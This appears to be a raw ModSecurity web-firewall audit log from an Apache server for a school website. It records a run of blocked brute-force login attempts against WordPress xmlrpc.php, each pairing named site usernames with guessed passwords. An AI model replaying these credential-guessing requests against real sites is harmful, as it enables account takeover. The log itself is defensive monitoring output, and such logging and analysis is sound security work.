"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865669162978 6153 (- - -) Stopwatch2: 1749865669162978 6153; combined=4306, p1=545, p2=3588, p3=0, p4=0, p5=102, sr=96, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --414ec625-Z-- --974fdb52-A-- [14/Jun/2025:08:48:52 +0700] aEzVBGmwZ6YUkjOdtI7DgwAAAAk 103.236.140.4 34240 103.236.140.4 8181 --974fdb52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --974fdb52-C-- wp.getUsersBlogs wakasarpras admin12345 --974fdb52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --974fdb52-E-- --974fdb52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (83+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865732552347 4658 (- - -) Stopwatch2: 1749865732552347 4658; combined=3444, p1=388, p2=2884, p3=0, p4=0, p5=101, sr=84, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --974fdb52-Z-- --c07eb418-A-- [14/Jun/2025:08:49:54 +0700] aEzVQmIDXuKmWNi2UBS09gAAAEw 103.236.140.4 34428 103.236.140.4 8181 --c07eb418-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 237 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c07eb418-C-- wp.getUsersBlogs wakasarpras smkn22-jkt.sch.id123 --c07eb418-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c07eb418-E-- --c07eb418-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865794352080 5519 (- - -) Stopwatch2: 1749865794352080 5519; combined=4029, p1=486, p2=3291, p3=0, p4=0, p5=141, sr=97, sw=111, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c07eb418-Z-- --7f360119-A-- [14/Jun/2025:08:50:57 +0700] aEzVgWIDXuKmWNi2UBS1CAAAAEQ 103.236.140.4 34496 103.236.140.4 8181 --7f360119-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7f360119-C-- wp.getUsersBlogs wakasarpras Superadmin --7f360119-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f360119-E-- --7f360119-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865857550866 5373 (- - -) Stopwatch2: 1749865857550866 5373; combined=3837, p1=472, p2=3192, p3=0, p4=0, p5=102, sr=102, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f360119-Z-- --eb1a930f-A-- [14/Jun/2025:08:52:01 +0700] aEzVwUMWfhkd5Y0sFtrq7wAAAJM 103.236.140.4 34602 103.236.140.4 8181 --eb1a930f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --eb1a930f-C-- wp.getUsersBlogs wakasarpras verystrong --eb1a930f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb1a930f-E-- --eb1a930f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (49+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865921436497 4711 (- - -) Stopwatch2: 1749865921436497 4711; combined=3307, p1=405, p2=2743, p3=0, p4=0, p5=92, sr=83, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb1a930f-Z-- --94953a62-A-- [14/Jun/2025:08:53:01 +0700] aEzV_WmwZ6YUkjOdtI7DwwAAAAU 103.236.140.4 34788 103.236.140.4 8181 --94953a62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --94953a62-C-- wp.getUsersBlogs wakasarpras internet --94953a62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94953a62-E-- --94953a62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865981134141 3982 (- - -) Stopwatch2: 1749865981134141 3982; combined=3086, p1=343, p2=2578, p3=0, p4=0, p5=95, sr=75, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94953a62-Z-- --8d40af2c-A-- [14/Jun/2025:08:54:01 +0700] aEzWOV3g_boun6Rx5jLRNQAAANc 103.236.140.4 34890 103.236.140.4 8181 --8d40af2c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8d40af2c-C-- wp.getUsersBlogs wakasarpras public --8d40af2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d40af2c-E-- --8d40af2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866041703508 5131 (- - -) Stopwatch2: 1749866041703508 5131; combined=3568, p1=475, p2=2954, p3=0, p4=0, p5=85, sr=93, sw=54, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d40af2c-Z-- --8bbc102e-A-- [14/Jun/2025:08:55:01 +0700] aEzWdWIDXuKmWNi2UBS1WwAAAFQ 103.236.140.4 35050 103.236.140.4 8181 --8bbc102e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8bbc102e-C-- wp.getUsersBlogs wakasarpras asdsa --8bbc102e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8bbc102e-E-- --8bbc102e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (76+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866101953878 6112 (- - -) Stopwatch2: 1749866101953878 6112; combined=4239, p1=546, p2=3523, p3=0, p4=0, p5=101, sr=113, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8bbc102e-Z-- --388a8216-A-- [14/Jun/2025:08:55:30 +0700] aEzWkmIDXuKmWNi2UBS1gAAAAEo 103.236.140.4 35132 103.236.140.4 8181 --388a8216-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --388a8216-C-- wp.getUsersBlogs wakasarpras 1234%^&* --388a8216-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --388a8216-E-- --388a8216-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866130665651 4317 (- - -) Stopwatch2: 1749866130665651 4317; combined=3315, p1=355, p2=2760, p3=0, p4=0, p5=115, sr=80, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --388a8216-Z-- --045fa617-A-- [14/Jun/2025:08:56:01 +0700] aEzWsWIDXuKmWNi2UBS1wAAAAEI 103.236.140.4 35266 103.236.140.4 8181 --045fa617-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --045fa617-C-- wp.getUsersBlogs wakasarpras g_czechout --045fa617-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --045fa617-E-- --045fa617-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (100+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866161255568 4500 (- - -) Stopwatch2: 1749866161255568 4500; combined=3350, p1=340, p2=2821, p3=0, p4=0, p5=111, sr=79, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --045fa617-Z-- --17a7f215-A-- [14/Jun/2025:08:57:08 +0700] aEzW9GmwZ6YUkjOdtI7EGAAAAAE 103.236.140.4 35364 103.236.140.4 8181 --17a7f215-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --17a7f215-C-- wp.getUsersBlogs wakasarpras chicken --17a7f215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17a7f215-E-- --17a7f215-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866228572535 6048 (- - -) Stopwatch2: 1749866228572535 6048; combined=4156, p1=524, p2=3430, p3=0, p4=0, p5=117, sr=93, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17a7f215-Z-- --255d0e06-A-- [14/Jun/2025:08:58:08 +0700] aEzXMGmwZ6YUkjOdtI7EZgAAAAk 103.236.140.4 35540 103.236.140.4 8181 --255d0e06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --255d0e06-C-- wp.getUsersBlogs wakasarpras picture1 --255d0e06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --255d0e06-E-- --255d0e06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (85+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866288303749 4274 (- - -) Stopwatch2: 1749866288303749 4274; combined=3281, p1=360, p2=2752, p3=0, p4=0, p5=99, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --255d0e06-Z-- --5b78a645-A-- [14/Jun/2025:08:59:16 +0700] aEzXdF3g_boun6Rx5jLRPwAAAM4 103.236.140.4 35642 103.236.140.4 8181 --5b78a645-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5b78a645-C-- wp.getUsersBlogs wakasarpras 99999999 --5b78a645-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b78a645-E-- --5b78a645-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (47+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866356243897 5473 (- - -) Stopwatch2: 1749866356243897 5473; combined=3879, p1=506, p2=3171, p3=0, p4=0, p5=116, sr=126, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b78a645-Z-- --d27aea71-A-- [14/Jun/2025:09:00:24 +0700] aEzXuEMWfhkd5Y0sFtrrDQAAAIU 103.236.140.4 35752 103.236.140.4 8181 --d27aea71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d27aea71-C-- wp.getUsersBlogs wakasarpras arsenal --d27aea71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d27aea71-E-- --d27aea71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866424324133 5114 (- - -) Stopwatch2: 1749866424324133 5114; combined=3574, p1=455, p2=2929, p3=0, p4=0, p5=111, sr=86, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d27aea71-Z-- --2a3ccd7b-A-- [14/Jun/2025:09:01:24 +0700] aEzX9GIDXuKmWNi2UBS18wAAAEw 103.236.140.4 35898 103.236.140.4 8181 --2a3ccd7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2a3ccd7b-C-- wp.getUsersBlogs wakasarpras lollypop --2a3ccd7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a3ccd7b-E-- --2a3ccd7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866484632987 5630 (- - -) Stopwatch2: 1749866484632987 5630; combined=3957, p1=492, p2=3227, p3=0, p4=0, p5=134, sr=110, sw=104, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a3ccd7b-Z-- --9bb8ac0d-A-- [14/Jun/2025:09:02:24 +0700] aEzYMGIDXuKmWNi2UBS2EgAAAFI 103.236.140.4 36036 103.236.140.4 8181 --9bb8ac0d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9bb8ac0d-C-- wp.getUsersBlogs kasubagtu Admin@123 --9bb8ac0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bb8ac0d-E-- --9bb8ac0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (59+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866544167975 4254 (- - -) Stopwatch2: 1749866544167975 4254; combined=3295, p1=380, p2=2748, p3=0, p4=0, p5=97, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
